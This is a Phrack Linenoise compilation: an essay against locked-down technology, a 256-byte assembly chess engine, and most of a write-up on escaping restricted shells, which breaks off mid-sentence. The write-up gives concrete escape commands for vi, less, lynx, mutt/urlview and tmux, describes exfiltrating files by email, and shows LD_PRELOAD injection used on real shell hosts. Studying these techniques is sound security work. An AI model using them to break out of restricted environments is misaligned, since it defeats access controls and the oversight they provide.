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==Phrack Inc.==
Volume 0x0f, Issue 0x45, Phile #0x04 of 0x10
|=-----------------------=[ L I N E N O I S E ]=-----------------------=|
|=-------------------------=[ various ]=-------------------------=|
An old Phrack Staff member and friend used to say that "a strong Linenoise
makes a good release".
We begin our journey with an interesting philosophical article, "Hacker
Luddites" by an anonymous author. TL;DR, ever had an iPhone? Have you
realized you don't actually own something you paid several hundreds of
bucks to acquire? The "cloud era" trend, which has convinced many people
as well businesses, to literally grant owning rights for their data to
large corporations, is now everywhere. How is it affecting our state of
mind and where is this going?
Our technical part is very strong. Baudsurfer developed an interesting ASM
chess game in just 256 bytes; read the heavily-commented code and feel the
nostalgia in your bones. More old-school goodness in a lovely article
dealing with secure shells and how one can exploit common misconfigurations
to bypass various limitations and break out of restricted environments.
Articles like this have a lot to offer to the hacking community. We urge
our dear readers to follow DangerMouse's example and submit more articles
like his!
The next article has a strange back story. We received this submission
long ago and we decided to publish it. Admittedly, a lot of time has passed
since then. The author has stopped replying to mails, but he was originally
positive about publishing his work. Read it and see how you can cause
short ID key collisions in GPG. As our everyday computing machines become
increasingly powerful, such attacks become more and more realistic.
Following that are two excellent short articles exploring subjects every
exploit developer is doomed to deal with, namely boundary conditions and
shellcoding. Our rotten haxor chown has written a nice guide on how to use
Microsoft's Z3 solver to facilitate the process of exploit development.
Recently (well, maybe not so recently, lulz), there has been a shift
towards more formal methods even by old-school haxors who have always
preferred and obeyed the KISS (Keep It Simple, Stupid!) primitive. Hackers
have understood that the process of vulnerability discovery as well as
exploit development can be augmented by modern mathematics and maybe become
even more interesting! One cannot easily forget p64_0x08.txt, right? In the
next article, fishstiqz shows us how you can simply use your compiler to
easily build shellcodes for Windows. If you ever thought shellcode
development on Microsoft's operating system is a pain in the ass, then
this article is definitely for you.
Last but not least we have an opinion piece on the vulnerability
disclosure circus, the incentives and the related moral questions (lulz)
by two anonymous contributors. It is balanced and dispassionate and we
urge you to read it in the same manner.
That's it you greedy mofos, another strong Linenoise! Enjoy!
--[ Contents
1 - Hacker Luddites ................................... anonymous
2 - Chesslin .......................................... Baudsurfer
3 - He Compels Secure Shells .......................... DangerMouse
4 - Personalized PGP Key IDs .......................... f1los0tt1l3
5 - How to cheat at maths ............................. chown
6 - Shellcode the better way, or how to just
use your compiler ................................. fishstiqz
7 - Resisting the Hy(p|v)e ............................ anon & anon
|=[ 0x01 ]=---=[ Hacker Luddites - anonymous ]=--------------------------=|
In the west, far gone are the days of slavery. Men live freely with their
minds and bodies. So the idea of technology potentially limiting these
things is absurd.
Computer technology today might not always encourage these principles of
free mind and body though. Hardware and software is increasingly built in
the same manner as stone walled gardens, restricting those outside the
inner circles of technocrats. The designers decide to clutch tightly to
their systems, defining the full set of actions allowable and therefore
thinkable on their systems. They are limiting the potential for
creativity, discovery, and reason in order to further profit. This profit
is furthered by control because certain control limits piracy, stops
malicious software from propagating, simplifies the user experience for
the majority of consumers, and creates revenue through software-regulated
micro decisions that constrain the full capacity of the hardware and
software systems being sold.
Only the masters of the garden, the designers, are allowed inside the
stone walls, where they are free to create and are conscious of the inner
workings and plans. Those outside are not allowed inside the garden. Those
who are not inside the circle of the original creators do not get to
create without delegated permission. And consumers and third-party
developers are too far down the caste system to be allowed arbitrary
control of their own possessions.
This leaves the creators on the outside of the stoned walls dependent on
brilliant and dedicated minds to bypass the wishes of the designers. These
brilliant minds attain a level of consciousness about the constraints of
the system that the designers themselves did not understand, and pass this
on to the masses. Along the way come miscreants, thieves, and pirates.
In a free market system, if more arbitrary creation is vital in the long
term, then more creative systems will arise to fill the need. In the short
term, allowing feedback from the outer castes and integrating their ideas
has been shown to be more than sufficient for sustained exponential growth
on the rise to market domination.
Hacker Luddite: (Oxymoron) A person opposed to technology that greatly
limits, through artificial means, human potential for consciousness,
reason, or creativity with that same technology.
Hacker Luddites hate stone wall garden technologies. Why shouldn't a
person be allowed to hold a piece of technology and attempt to modify or
adapt that technology to suit their will at any given moment? The only
limitation should be the consciousness required to make changes. And
certainly not artificially restricted by the designers of the technology.
In the same way that Kant based the premises of the categorical imperative
on the ability for humans to reason, Hacker Luddites view this capacity
for reason as a fundamentally important human ability. When computer
technology, purchased and entirely in the physical possession of the
owner, denies arbitrary modification and creation, it greatly reduces the
ability to reason about the universe with that technology. That technology
does not allow people to transcend the designers ideas and fully embrace
some of their most important human traits. Instead it delegates the
consumers to subordinates with restricted consciousness, and restricted
capacity for reason, and restricted creativity.
Next up, computer technology applied excessively for the conversion of
human attention into personal profit.
To the hacker luddites, another nefarious category is the computer systems
of the world which have been built to turn human attention into profit.
Rather than proceeds coming from the advancement of humanity, the proceeds
come primarily from the ability to guide human attention into that
technological system. The system might be making the profit through ads,
or it could be a game consumers pay for.
It is understood that resources are required to run technologies and that
some exchange of information and resources is expected between consumers
and creators of that technology. Ads can be helpful to a consumer by
showing them products which they actually want, and games or sites for
information exchange are highly enjoyable to many people and therefore
provide benefit. It is when the methods and means become excessive that
hacker luddites take an issue.
When technologies, whether delivering advertisements or games, exploit
human psychology and physiology to turn a profit from their consumers,
they may often be directly limiting, and in a significant way, the
consciousness, reason, or creativity of that consumer.
The other problem is when instead of advertisements showing people what
they want, advertisements subconsciously manipulate peoples desires (such
as sex, popularity, and power) to override their consciousness and
reasoning abilities to get them to want and purchase products regardless
of the products abilities to help the consumer attain those desires.
And what if technologies instead of providing an opportunity for
relaxation or fun or profound information sharing or whatever also create
systems of psychological control where neurophysics brings users attention
back to technology to get addictive releases of dopamine or serotonin or
who knows what, using the darker arts of gamification. Or perhaps innate
human survival mechanisms related to group dynamics are being exploited by
the technology, such as showing automatically generated advertisements,
messages, and symbols as endorsed by members of a group, or creating
virtual resource systems where drives for competition or collaboration
drive behavior.
It may be that these technologies which capture human attention are simply
what most consumers want from their technology, after all 30% of internet
traffic generated by humans is for porn [1]. If distraction and the
subordination of reason, creativity, or consciousness is the will of the
majority, Hacker Luddites seriously disagree with the majority and most
definitely oppose the designers that subordinate them.
What defenses does the modern person have to protect against the likes and
tweets and clicks and slide to unlocks and checkmarks and tabs and porn
and endless dopamine and serotonin harvesting mechanisms? These systems
were sometimes built to reap monetary gain, sometimes built for
communication control, and sometimes for nothing of any value... in
exchange for a portion of the time, attention, and thoughts of the user as
well as their information...
Don't buy and don't use them.
If you do use them, use the them only in great moderation and only at
consciously specified times.
Inform others and expose existing and emerging technologies which may be
limiting human potential.
Augment the technology in your possession to block advertisements.
Degrade the quality or value of your attention to the attention-to-profit
technologies by:
- Sharing and proxying accounts with multiple users.
- Writing user interfaces to the user interfaces.
- Poisoning user activity with subtle fuzzers alongside your normal
activity where it makes sense.
Similarly, make your information more useless by lying.
- Don't bother with real names where they don't matter.
- Fill out forms like madlibs.
[1] http://www.extremetech.com/computing/123929-just-how-big-are-porn-sites
-- 30% of the internet traffic out there is porn
|=[ 0x02 ]=---=[ Chesslin - Baudsurfer/Red Sector Inc. ]=----------------=|
[ by Baudsurfer/Red Sector Inc. ]
|=--[ Introduction
This is a sizecoding exercise to code a playable chess engine in 256 bytes.
This POC is very experimental and bears several shortcomings when comparing
with any other real FIDE existing chess game engine : you have been warned.
It plays like a fish as AI is reduced to a half-ply max solely, it also has
no end-game detection, pawns move only a single square, it cannot castle or
do promotions - let alone en-passant - and takes about a hundred seconds to
play. It also only works on Microsoft Windows XP SP3. Like minimalist Edlin
line editor Cheesslin focuses on a single console line. Whites start at the
bottom of the virtual chess board but SAN notation order is inverse ranks :
1 r n b q k b n r
2 p p p p p p p p
7 P P P P P P P P
8 R N B Q K B N R
So in order to test Chesslin one can uudecode below binaries to input first
algebraic notation "h7h6" characters starting game by moving the White pawn
on H file from seventh rank to sixth rank. A longer example string sequence
of gameplay is "h7h6h2h3g8f6h3h4f6g4h4h5g4h2g1h3h2f1h3g5". Remember if your
keyboard input is not legal chess then Chesslin will silently expect you to
enter again a conforming four ascii character string just to proceed. Thus,
if only a single faulty character was entered you will need to fill-in with
three more "dummy" characters before re-typing a desired algebraic notation
for validation only occurs every four-chars exactly. All bugs are ofc mine.
|=--[ Chesslin binaries
begin 644 CHESSLIN.COM
begin 644 CHESSLIN.COM
|=--[ Chesslin source code
; "You don't need eyes to see You need vision." - Faithless _
; Special greets to : Impure ASCII 1940 and Divine Stylers! | |
; Greets : Alco Bon^2 BReWErS CODEX Flush Lineout Mandarine .--' `--.
; Onslaught Paranoimia Quartex Rebels Razor1911 RiOT Titan. `--. .--'
; _ _ _ _ _ ___| |___
; ______)\___ )\_________)\_______________)\_________)\ / \
;/________ __\\ __________ _________ ____ /____ ____ / \ /
; ______)\\__ \____ ___)\_____ _)\ /(_____)\ /(____ \ /
; _/ _ _/ / _ \_\____ _ \_\ \/ _/\ \/ _/ \ /
; \ \ \___\__ \ / \) __\___ __ /_\___ __ /_____ __> <__
; \ \_/ / \ / \/ /__\)_ _/__\)_ / (___ ___)
; \ / /____/\ /\ /\ / /\/ X /\/ / | |
; /_________/ \__/ \_______/_\____ ___/ \________/ ::::;| |
;: ___)\ __)\____________ | |;: :
;.-------------------------------, \ \\_\ \_____ ____/ gRK | |
;\Red Sector Incorporated presents\ \ \_(__)_ _)\ ___ ( )
; \Chesslin minimalist chess engine\ \ \ (__) \_/ /_ _/ \_
; \A 256 bytes DOS tiny intro XPSP3\ \ \ \ _ / \ _> <_
; \For Phrack Magazine #0x45 _ 2016\ \ \/ \ \ \_(___________)
;;;;,\Coded by Baudsurfer\RSi \\ &FU \ \ /\ \ \_____X___________>
; `------------------------' `----' \_/ \_____\___/
w equ word ; 16-bit prettifying helper,Chesslin v1.0 in 2016
d equ dword ; 32-bit prettifying helper,fasm assembler syntax
org 100h ; binary ip execution seg start address above psp
pusha ; para down stack and avoid input buff collisions
rep stosb ; prepare board empty squares assumes ax=0 cx=255
cwd ; set Black=0=top active player turn, White=8=bot
xchg ax,di ; shorter mov di,ax prepares writing segment base
mov cl,20h ; 32 initialization decoding bit rotations in all
a:mov eax,52364325h ; back-rank "rnbqkbnr" nibble-encoded 32b pattern
rol eax,cl ; rotate next Black chess piece value in lsnibble
and al,15 ; isolate a Black chess piece value from lsnibble
stosb ; left-to-right write Black back-rank major piece
mov [di+0eh],si ; left-to-right write Black pawns assumes si=100h
mov [di+5eh],bp ; left-to-right write White pawns assumes bp=9xxh
or al,8 ; transforms Black back-rank major piece to White
mov [di+6fh],al ; left-to-right write White back-rank major piece
sub cl,3 ; fixes back-rank pattern nibble rotation counter
loop a ; file-by-file ranks init loops 20h/(3+1)=8 times
b:mov si,0fffbh ; point source index to algebraic notation buffer
push si ; shorter save of algebraic notation buffer start
mov cx,4 ; print dword ascii algebraic notation buffer str
c:lodsb ; get one of four usr/cpu bytes from ascii buffer
int 29h ; dos api fast console out display char al=[di++]
loop c ; continue until ascii file-first pair chars left
xor dl,8 ; alternate active player turn Black=0 or White=8
pop di ; shorter restore algebraic notation buffer start
jnz h ; if active player turn is White then do keyboard
fldz ; else Black active player turn fpu load +0.0 cst
fbstp [di-6] ; and store back 80-bit packed bcd decimal number
e:mov si,0fff5h ; zeroed this,best score 0fff5h and coords 0fff7h
lodsw ; move lsb=potential capture vs. msb=best capture
cmp al,ah ; compare this capture value against best capture
jc f ; prune calculations if capture already lower val
call n ; else verify the attack potential chess legality
jc f ; capture higher value but move was illegal chess
mov [di-7],al ; successful calculation thus store newer highest
fild d [di] ; successful calculation thus load current coords
fistp d [si] ; successful calculation thus store highest coord
f:inc d [di] ; resume exploring exhaustive [0;0ffffh] interval
jnz e ; including subset ["1a1a";"8h8h"] until finished
mov cl,2 ; convert int32 to two file-first algebraic words
g:lodsw ; get first int16 msw/lsw algebraic notation word
aam 16 ; integer to expanded zero-based file/rank nibble
add ax,2960h ; translate file/rank to ascii chess board origin
stosw ; write pair=half of the ascii move buffer string
loop g ; get next int16 msw/lsw words algebraic notation
jmp k ; and proceed examining ascii move buffer strings
h:mov si,di ; di points to 0fffbh for both input and verifify
i:mov di,si ; resets every input to algebraic notation buffer
mov cl,4 ; one file-first algebraic notation is four bytes
j:cbw ; zero accumulator msb to set funct get keystroke
int 16h ; al=dos bios keyboard services api blocking read
stosb ; src file=fffb;rank=fffc dst file=fffd;rank=fffe
loop j ; all file-first algebraic ascii quartet inputed?
call n ; else verify algebraic ascii move is legal chess
jc i ; if not then proceed to ask user input move anew
k:call l ; converts algebraic notation buffer ascii source
push w b ; redirect second fall-through return to printout
l:lodsw ; algebraic notation buffer ascii source then dst
sub ax,3161h ; convert to zero-based alphanumerical 3161h="a1"
aad 16 ; convert to x88 board representation (al+=ah*16)
mov di,ax ; add x88 chess board representation memory start
test cl,cl ; verify caller's asked mode is passive or active
jnz m ; call asked mode mutex is passive so skip writes
xchg [di],ch ; call asked mode mutex is active so write board!
m:and al,88h ; test if inside main chess board x88 bitmask use
ret ; return to standard callers or printout redirect
n:pusha ; save reg vals in: si=fff7h/fffbh di=fffbh/ffffh
mov si,0fffbh ; point source index to current ascii move buffer
mov cl,8 ; set passive mode count mutex for only verifying
call x ; convert buffer ascii src pair to x88 memory add
jz u ; source is non-conforming : illegal empty square
xor dl,al ; sets move conformitiy using active player color
test dl,cl ; test move conformity using active player colour
jnz u ; source is non-conforming : opponent turn colour
mov bx,di ; else if source conforming then save piece addr.
mov dh,al ; else if source conforming then save piece value
call x ; convert buffer ascii dest to x88 memory address
jz o ; if move nature not an attack skip over captures
xor dl,al ; sets move conformitiy using active player color
test dl,cl ; test move conformity using active player colour
jnz u ; destination is non-conforming : same turn color
o:sub di,bx ; source & destination conforming so obtain delta
mov [0fff5h],al ; save piece value as non-transactional potential
mov al,dh ; restore previous saved move source piece nature
and al,7 ; normalize gray piece nature colorless isolation
test al,1 ; determine source piece's parity interval length
jz p ; piece face=piece nature=piece value=piece score
mov cl,4 ; override halfing default interval len if parity
p:cmp al,1 ; test if moving piece is a special handling pawn
mov bx,y ; piece memory address off-by-one index ret fixed
xlatb ; move piece original start offset memory address
xchg ax,di ; offset becomes accumulator becomes displacement
jnz s ; leave if move source piece not special handling
test dh,8 ; else adjust move source pawn color displacement
jnz q ; no White pawn displacement sub-interval fixings
scasd ; displacement interval offset+=4 for black pawns
q:test ch,ch ; verify if pawn is attacking an opponent piece ?
mov cx,2 ; loop index clears msb placeholder also sets lsb
jnz s ; if non-empty square : pawn attacking diagonally
dec cx ; else decrease parity interval size special case
r:scasw ; displacement interval start+=2 prunes attacking
s:add di,bx ; set displacement interval scanning start offset
repnz scasb ; verify move exists in displacement sub-interval
jz v ; ZF set legal src piece displacement delta found
jmp u ; illegal src piece displacement: delta not found
t:pop ax ; bail shotcircuits nested dataflow function call
u:stc ; carry mutex persists indicating move is illegal
v:popa ; persistant CF mutex is indicator to legal chess
ret ; restore move mode mutex cl=passive or cl=active
x:call l ; verify this move legal within inside main board
jnz t ; exits for illegal move piece outside main board
cmpxchg [di],al ; discriminate from special case zero return vals
y:db 195,21,7,19,15,15,15 ; p[1]PF4,n[2]PF8,b[3]PF4,q[4]PF8,r[5]PF4,k[6]PF8
z:db -33,-31,-18,-14,14 ; prev label is ret+1 parity displacement offsets
db 18,31,33,-16,16,-1,1 ; z array is displacement overlap interval values
db 15,17,-15,-17,-16 ; knight rook+8 bishop+12 pawns White+12 Black+18
db -32,15,17,16 ; queen and king moves are rook+bishop+pawn moves
|=[ 0x03 ]=---=[ He Compels Secure Shells - DangerMouse ]=---------------=|
|=----------------------=[ He Compels Secure Shells ]=-------------------=|
|=------------------------=[ by DangerMouse ]=---------------------------=|
--[ Table of Contents
--[ Introduction
--[ Exploration - Primitive Gathering.
----[ Execution Primitive
----[ Write Primitive
----[ Read Primitive
--[ A real life example - freeshell.org
--[ A real life example - Private shell box
--[ Attacking the transport
--[ Conclusion
--[ References
--[ Appendix A - Common commands with useful primitives
--[ Appendix B - psh Source code
--[ Introduction
Welcome reader, in this small text we will look at a scenario which is
probably familiar to most of you. That is, breaking out of secure shells.
For those of you who don't know, a common scenario exists where an
administrator of some kind of device wishes to grant restricted access to
the functionality of that device. To accomplish this he/she will create a
shell (graphical or cli) which provides a subset of the features of the
system to the user. This may be as simple as replacing the user in
question's UNIX account shell with a custom written readline() loop which
executes options from a set list of commands.
There are numerous pit-falls associated with this practice which provide us
with a means to escalate our privileges from within the restricted shell.
In this write-up we will examine some of these pitfalls, as well as look at
the general process for investigating a restricted shell and eventually
breaking out to a higher entitled environment. To illustrate these points
we will look at some real life examples of secure shells and how we can
break them.
Some examples of pre-packaged, existing restricted shells are:
rbash/rssh/smrsh/rksh, however there also exists an endless array of custom
shells written for one off cases.
--[ Exploration - Primitive Gathering.
When investigating a secure shell environment, I find it best to
systematically explore each of the options within the shell looking to
collect certain primitives with which to elevate the options available.
----[ Execution Primitive
Typically the most useful primitive which we gain is the execute primitive.
Sometimes the ability to execute arbitrary commands is enough to break out
of the shell, for example executing a more complete shell such as bash from
within a restricted shell can often be enough to completely invalidate the
security of the system. Some examples of how to gain this primitive are:
- Using the shell execute feature of many common shell commands, for
example using the "!<shell command>" feature of the less pager.
- Invoking the execution of a text editor (often defined by the EDITOR
variable) from within another application. Then using shell execute
features of the editor to escape.
- Combining other primitives to hijack execution of exposed applications.
Here is a commonly used example of using the vi command to gain an
execution primitive:
~$ vi
:set shell=/bin/sh
From a GUI perspective, many years ago, after drinking at a conference we
decided it would be fun to create a game around breaking out from the many
netcafe's which littered the streets at this time. These netcafes used to
provide a restricted windows GUI with functionality removed, and the goal
was to race to break out, without using any real 0day.
Often in this scenario an easy win was provided by invoking the mirc32.exe
application (when it was whitelisted) and then using the /exec command to
invoke cmd.exe. Another option was to set the handler for telnet:// uri's
in the browser to cmd.exe and spawn it that way.
Another byproduct of using software in an unintended way is that the
security evaluation of the product technically neglects the permiters that
are being exposed to an untrusted user. This means that often there are
trivial memory corruption bugs exposed in the application which go
unreported since even when people find them they do not care a great deal.
$ perl -e'print "A"x50,"\n"' | ftp
Segmentation fault: 11
It is definitely worthwhile auditing some of the commonly included commands
in secure shells for easily triggerable memory corruption bugs, since these
can often be all that's needed to gain the execution primitive and win.
Another common method of gaining the execution primitive is to abuse
environment variable control to influence the dynamic linker. Typically
this means setting the LD_PRELOAD/DYLD_INSERT_LIBRARIES/Whatever variable
that provides a mechanism for injecting shared objects into a process as
soon as the dynamic linker loads. Obviously for this to work we also need a
write primitive before hand to store the library we wish to load somewhere.
The tmux example later in the paper shows a real life case where this was
----[ Write Primitive
Obviously in some cases we cannot easily gain the execute primitive. In
these cases we also looking for additional primitives which we can leverage
to eventually gain an execution primitive.
Finding a write primitive is usually pretty easy. Most applications need
some way to retain state between runs. Some examples are:
- Input redirection operators ('>', '>>', '>|', '<>', '>&', '&>', etc)
- Save ability of applications, text editors, etc
- Log files
In one case I saw, a write primitive alone was enough to break out of the
restricted shell. By writing to a .unrestricted_user file within the home
directory of your user account, the next login was presented with a bash
shell. This is not typically the case though.
When a write primitive is aquired it is also worth keeping in mind the
trick mentioned in [3]. If any of the invoked shell commands use wildcard
expansion on a directory, it can sometimes be possible to create files
beginning with the '-' character, to pass arguments to those commands.
As you will see in the real life examples below, write primitives are
typically available in most applications, and can easily be leveraged in a
variety of ways to continue breaking out of the shell.
----[ Read Primitive
When talking about a read primitive, we need some way to read an arbitrary
file from the file system and display its contents on the screen.
Sometimes this can be relatively straight forward, for example in a shell
which uses /usr/bin/less as a pager, you can use the :e (examine) command
to open an alternative file. However often with less you can execute a
command with ! as well, but in a case where you are unaware of the file
system, you can use the e command to brute force directory structure to
find things which are worthwhile executing.
Other applications are less straight forward, sometimes the read primitive
may be filtered, or evaluated as a config file for the program. In these
cases, sometimes contents of the file can only be retreived via error
messages. Basically whenever you see a file path being provided to an
application, you can test it wtih some known files to see if there is a way
to retreive the contents.
Even when it is im-possible to retrieve the contents of a file, sometimes a
program will respond differently when a file exists or not. This may be
easily noticed, or something subtle like return codes. This leak can be
used to map out the file system.
--[ A real life example - freeshell.org
Now that we've looked at a more generic approach to defeating secure
shells, we will look at some real world examples. The first of which is the
restrcited shell "psh" which is used in the freeshell.org environment. (SDF
Public Access UNIX System).
Before we get started looking at freeshell.org, i'd just like to say, I
have nothing but respect for freeshell.org. I have been playing with the
restricted shell on there for around 12 years, and have broken it a number
of ways. Several times I have contacted the admins to let them know. To me
this has provided a constantly evolving wargame which has been hours of
The process of setting up an account on freeshell.org is really simple.
By ssh'ing into the freeshell.org box as the user "new" you are redirected
to a sign up process.
$ ssh new@freeshell.org
You will now be connected to NEWUSER mkacct server.
Please login as 'new' when prompted.
Connected to
Escape character is 'off'.
NetBSD/amd64 (ol) (pts/2)
login: new
Welcome to the SDF Public Access UNIX System - Est. 1987
You are the 79th guest today, logged in on 02-Sep-15 17:05:23.
Are you using Windows 2K or XP? (Y/N) N
This new user process takes us to the first restricted shell. FEP.
Typing `help` shows us the following menu:
FEP Command: help
|what | what is the SDF public access UNIX? |
|w2k | important info for Windows 2k/XP users |
|mkacct | create your own UNIX shell account |
|dialup | US & Canada SDF dialup access |
|teach | for teachers and UNIX class instructors |
|traceroute {host} | map a route to a specified host |
|whois {host} | list whois directory entry for a domain |
|ruptime | display system status |
|finger {user} | check if a login is available |
|software | ported and installed software packages |
|mil | information about our US Military Waiver|
|logout | disconnect from sdf.org |
As you can see this provides us with some basic applications which we can
run, but also allows us to kick off the mkacct process to make our own
By running the finger command on our current user (new). We can see that
the new user has a shell of /sys/new/mkacct, which is the restricted shell
we are in.
FEP Command: finger new
Login: new Name: SDF newuser
Directory: /sys/new Shell: /sys/new/mkacct
On since Wed Sep 2 17:05 (UTC) on pts/2 (messages off)
No Mail.
The next thing we can see, is that they have not sanitized the arguments to
finger. This means that we can pass arguments to the commands listed in the
menu, this is a common mistake that people make when making restricted
FEP Command: finger -?
finger: unknown option -- ?
usage: finger [-lmpshog8] [login ...]
If we enter finger by itself, we are prompted with the usage, rather than
displaying all users on the system logged in.
FEP Command: finger
usage: finger {user}
However by passing in --, telling getopts to terminate arguments, we can
accomplish the same thing, and list users logged into the system.
FEP Command: finger --
Login Name Tty Idle Login Time Office Office
new SDF newuser *pts/2 - Wed 17:05
smj Stephen M. Jones pts/0 33 Tue 21:39
smj Stephen M. Jones pts/4 33 Wed 16:34
This shell is not the focus of the write-up however, instead, if we run the
mkacct command, we are prompted for a user-name and password, and able to
log into our shiney new psh shell.
You are about to create a UNIX shell account. This account may be unlike
anything you've used before. We urge you to carefully read all the text
displayed on your terminal, as it will aide you in your learning.
We also encourage you to try all the commands available with your new
account. There are many types of games, applications and utilities
you will be able to instantly run in just a few moments. If you are
looking for a particular command or version of a command that we do not
have, there are ways to request that it be installed. We also offer DIALUP
and DSL in the USA and Canada which you will be able to learn about
shortly. Be patient, read what is displayed - Explore and Enjoy!
First, you need to choose a LOGIN. A LOGIN allows you to LOG IN
to the system. Your LOGIN can be 1 to 16 characters in length and
can be composed of alpha-numeric characters (middle period is OK).
What would you like to use for your login?
Type 'help' for Commands.
Type 'com' to chat with other users.
Type 'ttytter' to listen to Twitter Tweets anonymously.
Type 'mud' to play the SDFmud.
Type 'mkhomepg' to set up your personal website.
Did you know you can become a permanent LIFETIME member of SDF
by making a onetime donation of $36? Type 'arpa' for more info!
sdf:/udd/d/dangermouse> help
what - what can I use this account for?
unix - a listing of UNIX commands available to you NOW
how - information on increasing membership
teach - using SDF in a classroom setting
dialup - information about SDF dialup service
arpa - about lifetime arpa membership
bboard - sdf user message boards
commode - chat with other users online
ysm - chat on the ICQ network
bsflite - chat on the AIM network
msnre - chat on the MSN network
ttytter - listen to Twitter tweets anonymously
lynx - browse the WWW textually or access GOPHER
bksp - set your BACKSPACE key
faq - frequently asked questions
software - display software programs installed on the system
quote - get a real time stock quote
games - a listing of available games
thxmoo - connect to the THXMOO
mud - connect to the SDFmud
validate - gain additional shell access (also try 'user' for details)
As you can see, this shell gives us access to a variety of unix utilities
as well as perform some basic shell commands such as cat/cd/etc. However
this is a little deceiving as many of the commands are filtered. We can
change directory anywhere on the system, which is useful for exploring the
directory structure, however when we try to cat files to view their
contents we can see that only files in our home directory are available.
The first method which I found for breaking out of psh revolved around
the "lynx" text based web browser. My first thought was to open file://
based urls however they have disabled the ability to browse to arbitrary
My next thought was to spawn a shell with !, however when you attempt this,
the message "Spawning is disabled!" is shown. From this it was possible to
determine that lynx was being spawned with the "-restrictions=all" command
line argument. However, due to the nature of getopts() (the c library
function for parsing command line arguments) it is often possible to
re-enter the case associated for a particular argument. With this in mind
we could specify a new value for -restrictions, and spawn a shell with the
"!" key from within the new lynx. This has long been fixed in both lynx and
the SDF shell, psh.
The most recent way in which I escaped the psh shell was much more
complicated than the lynx method. The first step was to identify where the
source code for psh is located. Trying to change directory to an invalid
directory leaks this information, as seen below.
faeroes:/usr> cd doesnotexist
/usr/local/bin/psh[611]: cd: /usr/doesnotexist - No such file or directory
Next, I needed to view the source code of the psh, in order to look for
potential ways to escape. Attempting to use "cat" or "pico" to view this
file however, shows that they have placed restrictions around viewing files
outside of the home directory.
sdf:/usr/local/bin> cat /usr/local/bin/psh
usage: cat {filename}
Looking back at our list of possible applications to exploit for our
primitives I quickly fell apon the next most complex in the list, the
"mutt" mail client.
By pressing the E key on an email in mutt, it's possible to invoke the
command stored in the EDITOR environment variable, in the case of psh, this
However, since pico is executed from within mutt, the -o (sandbox) option
is not used. This means that from within the spawned pico process we can
read any file, giving us our read primitive. The current source code for
the psh shell is included in the appendix for you to learn from. In order
to read arbitrary files from pico, we simply press the ctrl+r (^R) key
combination and type a file-name.
From within this pico execution we are also able to save files using the
ctrl+o hotkey (^O). This provides us an arbitrary write primitive, which
will come in useful for us later.
In the freeshell case, from within this environment we actually have the
ability to send email. This provides an easy way for us to exfiltrate
files. This can be done by reading a file (such as psh) into our pico
session, then mailing it to a mailinator address for extraction.
Now that we have read/write primitives, we need to leverage them to gain
an execution primitive. After much investigation, the way that i ended up
doing this was to abuse the urlview feature of mutt.
Mutt offers the ability to select a email message and hit the ctrl+b (^B)
hotkey in order to display a list of url's within the email message. The
line in the config file which enables this is shown below.
^B M |urlview\n call urlview to extract URLs out of a
As you can see, the email message is simply piped to the urlview
application. The description of this application from the manual page
describes urlview as:
urlview is a screen oriented program for extracting URLs from
text files and displaying a menu from which you may launch a
command to view a specific item.
From the man page we can see that urlview is driven from a configuration
file, either a system wide one "/etc/urlview.conf" or a local user copy
"~/.urlview". This configuration file is worth investigation with our write
primitive to see what is available.
Again from the configuration file, we can see that the COMMAND option fits
our need. It's description is shown below.
COMMAND command
If the specified command contains a %s, it will be subsituted with the
URL that was requested, otherwise the URL is appended to the COMMAND
string. The default COMMAND is:
url_handler.sh %s
As you can see, all that's needed it to create a configuration file with
the following contents:
COMMAND /usr/pkg/bin/bash # %s
This will cause urlview to append the url to the above line, and execute
it. Since a # is used prior to the %s the url will be treated as a
comment. This results in an unrestricted bash shell being executed when we
select an email message, press v followed by ctrl+b.
Once again this technique has been fixed, I will leave it as an exercise
for the reader to find a new one. Hopefully freeshell is not angry about
this since it is a learning exercise.
--[ A real life example - Private shell box
Recently a friend of mine set up a private ircd box for some semi-trusted
people. He created a chrooted environment where a user could ssh into a
box and be greeted with a tmux session containing a single window with the
irssi client inside it. I was unable to create a new window, or execute any
other commands. Irssi was heavily restricted using a configuration file,
stopping easy wins like /exec from within the irssi client.
After some trial and error, i settled into the tmux man page for
inspiration. tmux supports a variety of commands which can be entered by
pressing the tmux hotkey (ctrl+b) in this case and the : key. This provides
a small shell in which you can enter commands to tmux.
Reading the man-page, one of the first commands which stood out was as
update-environment variables
Set a space-separated string containing a list of environment variables
to be copied into the session environment when a new session is created or
an existing session is attached. Any variables that do not exist in the
source environment are set to be removed from the session environment (as
if -r was given to the set-environment command). The default is "DISPLAY
To test this, i set the environment variable LD_PRELOAD to the value
/tmp/wut.so. Then i logged out and into the box. This resulted in a
segmentation faul upon connecting back as irssi tried to spawn, while
loading a shared library which didn't exist. Great i'd found a bug, but
unfortunately i'd locked myself out of the shell. Since this was a test, i
could luckily ask my friend to restart my tmux session, however in a real
case this would have been trouble. Now i had the ability to load a dynamic
library of my choice, however without the ability to create one on disk, i
was still not any better off.
After reading the tmux man page a little more, i came across the commands
responsible for managing the paste buffers.
Specifically, it is possible to load a paste buffer from a file using the
load-buffer [-b buffer-name] path
(alias: loadb)
Load the contents of the specified paste buffer from path.
With the paste buffer containing a file, you can then use:
show-buffer [-b buffer-name]
(alias: showb)
Display the contents of the specified buffer.
This creates a new tmux window, containing the contents of the file you
loaded. This gives us the read primitive.
We can also use the command:
save-buffer [-a] [-b buffer-name] path
(alias: saveb)
Save the contents of the specified paste buffer to path. The -a option
appends to rather than overwriting the file.
As you can see, this command allows us to write our buffer out to a
different file. To experiment with this, i copied a shared library that i
knew existed by loading it into the buffer, then writing it out to /tmp.
Then i set LD_PRELOAD, and validated that irssi did not crash.
The final command needed to break out of this shell is:
set-buffer [-a] [-b buffer-name] [-n new-buffer-name] data
(alias: setb)
Set the contents of the specified buffer to data. The -a option appends
to rather than overwriting the buffer. The -n option renames the buffer to
As you can see, this lets us manipulate the paste buffer in a more fine
grain manner, in order to create a .so that we can abuse to get controlled
code execution.
As you can see, the methodology at play here is very similar to the
previous examples, but the actual technology at play was very different.
--[ Attacking the transport
In some cases the restricted shell is just too restrictive, and it's just
not possible to gain any of these primitives. In these cases there are
still some things that are worth investigating. Sometimes you can attack
the protocol with which you are connecting to the system. The first
example, is the shellshock vulnerability (sorry to use a buzzword).
Systems which are vulnerable to shellshock can sometimes be exploited to
execute bash commands prior to invoking the users shell. This obviously
breaks out of the restrictive environment.
Another example, is when the shell is dynamically linked. (Such as
nologin typically). If the user is also given ftp access, or the ability to
otherwise write to their home directory, sometimes the .ssh/ directory can
be written to in order to create a config file, and if sshd is poorly
